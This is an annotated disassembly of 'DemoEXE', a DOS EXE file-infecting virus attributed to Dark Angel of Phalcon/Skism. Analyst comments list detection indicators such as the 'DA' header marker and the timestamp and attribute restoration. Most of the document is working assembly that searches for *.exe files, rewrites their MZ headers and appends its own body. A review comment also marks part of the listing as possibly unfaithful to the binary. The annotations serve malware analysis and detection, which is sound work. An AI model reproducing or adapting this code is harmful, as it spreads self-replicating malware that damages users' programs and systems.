
DEMOEXE

; --------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
; --------------------------------------------------------------------------

; Infection marker: the two-character constant 'DA'. infect_exe stores it in the
; initial-SP field (offset 10h) of every MZ header it rewrites, and checkEXE tests
; that same field to skip files that were already modified. An EXE header whose
; SP field equals this constant is therefore a detection indicator for this sample.
id = 'DA'

; --------------------------------------------------------------------------
; startvirus - entry point of the appended body (16-bit DOS, INT 21h services).
; Analyst summary of what the visible code does:
;   1. Computes its own load offset ("delta") into BP with a call/pop pair, so
;      every later data reference is written as [bp+symbol].
;   2. Copies the 8 bytes at jmpsave2/stacksave2 (host entry point and stack
;      saved at infection time) into jmpsave/stacksave for the hand-off code.
;   3. Points the DTA at newDTA and enumerates '*.exe' via find-first/find-next.
;   4. For each match, reads the first 1Ah header bytes and compares the
;      initial-SP field with the marker `id`; unmarked files go to infect_exe.
; Registers: BP = delta for the whole run; BX = file handle after `open`.
; Detection notes: the call/pop/sub delta idiom at the entry point, and a
; find-first/find-next loop over '*.exe' followed by header writes, are the
; behavioural signature of this listing.
; --------------------------------------------------------------------------
startvirus:
call next ; pushes the runtime address of `next`
next: pop bp ; bp = runtime address of `next`
sub bp,offset next ; bp = runtime address - assembled address (delta)

push ds ; saved for the hand-off; popped in done_infections
push es ; saved for the hand-off; popped in done_infections
push cs
pop ds ; ds = cs so [bp+...] data references resolve in this segment
push cs
pop es ; es = cs, destination segment for movsw
lea si,[bp+jmpsave2] ; source: entry/stack values stored at infection time
lea di,[bp+jmpsave] ; destination: operands used by the hand-off code
movsw ; 4 words = 8 bytes: jmpsave2 + stacksave2 -> jmpsave + stacksave
movsw
movsw
movsw

mov ah,1Ah ; INT 21h/1Ah: set DTA
lea dx,[bp+newDTA] ; search results go to the private DTA, not PSP:80h
int 21h

lea dx,[bp+exe_mask] ; ds:dx -> '*.exe'
mov ah,4eh ; INT 21h/4Eh: find first
mov cx,7 ; attribute mask 7 = read-only + hidden + system also match
findfirstnext:
int 21h ; executes find-first, or find-next when reached from find_next
jc done_infections ; carry set = no (more) matches

mov al,0h ; access mode 0 = read-only
call open ; opens the name in the DTA; handle ends up in bx

mov ah,3fh ; INT 21h/3Fh: read
lea dx,[bp+buffer]
mov cx,1Ah ; 1Ah bytes = the start of the MZ header
int 21h

mov ah,3eh ; INT 21h/3Eh: close
int 21h

; Header offset 10h is the initial SP; this listing reuses it as the marker slot.
checkEXE: cmp word ptr [bp+buffer+10h],id
jnz infect_exe ; no marker -> file is treated as unmodified
find_next:
mov ah,4fh ; INT 21h/4Fh: find next
jmp short findfirstnext
; --------------------------------------------------------------------------
; done_infections - restores the environment and transfers control to the
; original program. Reached when the file search reports no more matches.
;   - Resets the DTA to offset 80h and pops the ES/DS values pushed at entry.
;   - Takes ES + 10h as the relocation base and adds it to the saved code and
;     stack segments (the values were stored relative to the load image).
;   - Switches SS:SP with interrupts disabled, then executes a far jump whose
;     opcode (0EAh) is emitted as data and whose 4-byte operand is `jmpsave`,
;     i.e. the jump target is patched in memory at run time.
; Detection notes: a 0EAh byte immediately followed by runtime-written data is
; self-modifying code; the strings and the host entry point are stored right
; after it inside the appended body.
; NOTE(review): the three cs: operands below are indexed with SI, whereas every
; other reference in this listing uses the BP delta, and SI is not reloaded
; after the movsw sequence at entry. Treat the disassembly as possibly
; unfaithful to the original binary at this point.
; --------------------------------------------------------------------------
done_infections:
mov ah,1ah ; INT 21h/1Ah: set DTA
mov dx,80h ; offset 80h in the restored DS (presumably the PSP default DTA - confirm)
pop es ; restore ES pushed at entry
pop ds ; restore DS pushed at entry
int 21h
mov ax,es
add ax,10h ; ES + 10h paragraphs: relocation base for the saved segments
add word ptr cs:[si+jmpsave+2],ax ; relocate saved code segment of the jump target
add ax,word ptr cs:[si+stacksave+2] ; ax = relocated saved stack segment
cli ; no interrupts while SS and SP are inconsistent
mov sp,word ptr cs:[si+stacksave]
mov ss,ax
sti
db 0eah ; opcode of JMP FAR ptr16:16; its operand is the next dword
jmpsave dd ? ; far-jump operand, filled at run time from jmpsave2
stacksave dd ? ; low word = SP, high word = SS, filled from stacksave2
; Initial value for the first generation only; infect_exe overwrites it with
; the entry point read from each modified file's header.
jmpsave2 dd 0fff00000h
stacksave2 dd ? ; SP/SS read from the header by infect_exe

; Plain-text, NUL-terminated strings. They lie between startvirus and heap, so
; they are part of the byte range that finishinfection appends to each file.
; Nothing in the visible code references them; they serve as static string
; indicators when scanning EXE files.
creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0
virusname db '[DemoEXE] for 40Hex',0

; --------------------------------------------------------------------------
; infect_exe / finishinfection - rewrites the MZ header held in `buffer` and
; appends the body to the file named in the DTA.
; In:  bp = delta, buffer = first 1Ah bytes of the file, newDTA = search record.
; Header fields touched (offsets within `buffer`):
;   02h bytes in last page   04h page count        08h header size (paragraphs)
;   0Eh initial SS           10h initial SP        14h initial IP   16h initial CS
; DTA fields read (offsets within `newDTA`): 15h attribute, 16h time, 18h date,
;   26 (1Ah) file size dword, 30 (1Eh) file name.
; Forensic effects visible in this code:
;   - entry point CS:IP is redirected to the end of the original file image;
;   - initial SP is replaced by the marker `id`, SS is set equal to the new CS;
;   - the file grows by exactly (heap - startvirus) bytes;
;   - file attributes are cleared for the write and then restored, so the
;     read-only attribute gives no protection;
;   - the original date/time stamp is written back, so timestamps do not
;     reveal the modification.
; --------------------------------------------------------------------------
infect_exe:
les ax, dword ptr [bp+buffer+14h] ; ax = original IP, es = original CS
mov word ptr [bp+jmpsave2], ax ; keep the host entry point for the hand-off
mov word ptr [bp+jmpsave2+2], es

les ax, dword ptr [bp+buffer+0Eh] ; ax = original SS, es = original SP
mov word ptr [bp+stacksave2], es ; low word = SP
mov word ptr [bp+stacksave2+2], ax ; high word = SS

mov ax, word ptr [bp+buffer + 8] ; header size in paragraphs
mov cl, 4
shl ax, cl ; paragraphs * 16 = header size in bytes (16-bit result)
xchg ax, bx ; bx = header size in bytes

les ax, [bp+offset newDTA+26] ; ax = file size low word, es = high word
mov dx, es ; dx:ax = file size
push ax ; keep the file size for the page-count calculation below
push dx

sub ax, bx ; dx:ax = file size - header size = load image size
sbb dx, 0

mov cx, 10h
div cx ; ax = image size / 16 (segment), dx = remainder (offset)

mov word ptr [bp+buffer+14h], dx ; new initial IP
mov word ptr [bp+buffer+16h], ax ; new initial CS

mov word ptr [bp+buffer+0Eh], ax ; new initial SS = same segment as CS
mov word ptr [bp+buffer+10h], id ; initial SP doubles as the infection marker

pop dx ; dx:ax = original file size again
pop ax

add ax, heap-startvirus ; dx:ax = file size after the append
adc dx, 0

mov cl, 9 ; 512-byte pages
push ax ; low word is needed again for the remainder
shr ax, cl ; ax = low word / 512
ror dx, cl ; moves the high word's low bits into page-count position
stc ; forced carry adds one page for the partial last page
adc dx, ax ; dx = page count
pop ax
and ah, 1 ; ax = new size mod 512 (keeps the low 9 bits)

mov word ptr [bp+buffer+4], dx ; page count
mov word ptr [bp+buffer+2], ax ; bytes in last page

push cs
pop es ; es was overwritten by the les instructions above

mov cx, 1ah ; number of header bytes to write back
finishinfection:
push cx ; cx is reused below; keep the write length
xor cx,cx ; attribute value 0
call attributes ; clears read-only/hidden/system before opening for write
mov al,2 ; access mode 2 = read/write
call open ; bx = handle

mov ah,40h ; INT 21h/40h: write
lea dx,[bp+buffer] ; modified header image
pop cx ; cx = 1Ah
int 21h ; no seek since open, so this lands at the start of the file

mov ax,4202h ; INT 21h/42h, AL=2: seek relative to end of file
xor cx,cx
cwd ; AX has bit 15 clear, so this zeroes DX -> offset cx:dx = 0
int 21h

mov ah,40h ; INT 21h/40h: write
lea dx,[bp+startvirus] ; start of the in-memory body
mov cx,heap-startvirus ; appended length; excludes the heap (newDTA/buffer)
int 21h

mov ax,5701h ; INT 21h/57h, AL=1: set file date and time
mov cx,word ptr [bp+newDTA+16h] ; time recorded by the directory search
mov dx,word ptr [bp+newDTA+18h] ; date recorded by the directory search
int 21h

mov ah,3eh ; INT 21h/3Eh: close
int 21h

mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; attribute byte recorded by the directory search
call attributes ; put the original attributes back

mo_infections: jmp find_next ; continue the '*.exe' enumeration

; open - opens the file whose name the last directory search left in the DTA.
; In:  al = access mode (callers pass 0 = read, 2 = read/write), bp = delta.
; Out: bx = value returned in ax by INT 21h/3Dh (the file handle on success).
; The carry flag returned by DOS is not examined here or by the callers.
open:
mov ah,3dh ; INT 21h/3Dh: open existing file
lea dx,[bp+newDTA+30] ; DTA offset 30 (1Eh): ASCIIZ name of the matched file
int 21h
xchg ax,bx ; move the returned handle into bx for later read/write/close
ret

; attributes - sets the DOS attributes of the file named in the DTA.
; In:  cx = attribute value (0 before the write, the saved DTA byte afterwards),
;      bp = delta.
; Out: whatever INT 21h/4301h returns; the result is not checked by the callers.
; Monitoring note: an attribute change to 0, a write, and an attribute restore
; on the same EXE is the sequence this listing produces for each modified file.
attributes:
mov ax,4301h ; INT 21h/43h, AL=1: set file attributes
lea dx,[bp+newDTA+30] ; DTA offset 30 (1Eh): ASCIIZ name of the matched file
int 21h
ret

; Search pattern passed to find-first; only names matching '*.exe' in the
; directory being searched are examined.
exe_mask db '*.exe',0
; `heap` marks the end of the bytes that are appended to a file: the write in
; finishinfection uses the length heap-startvirus, so the two scratch areas
; below exist only in memory and never appear in a modified file.
heap:
newDTA db 42 dup (?) ; private DTA: find-first/find-next record (attribute, time, date, size, name)
buffer db 1ah dup (?) ; copy of the first 1Ah bytes of the file being examined
endheap:

end startvirus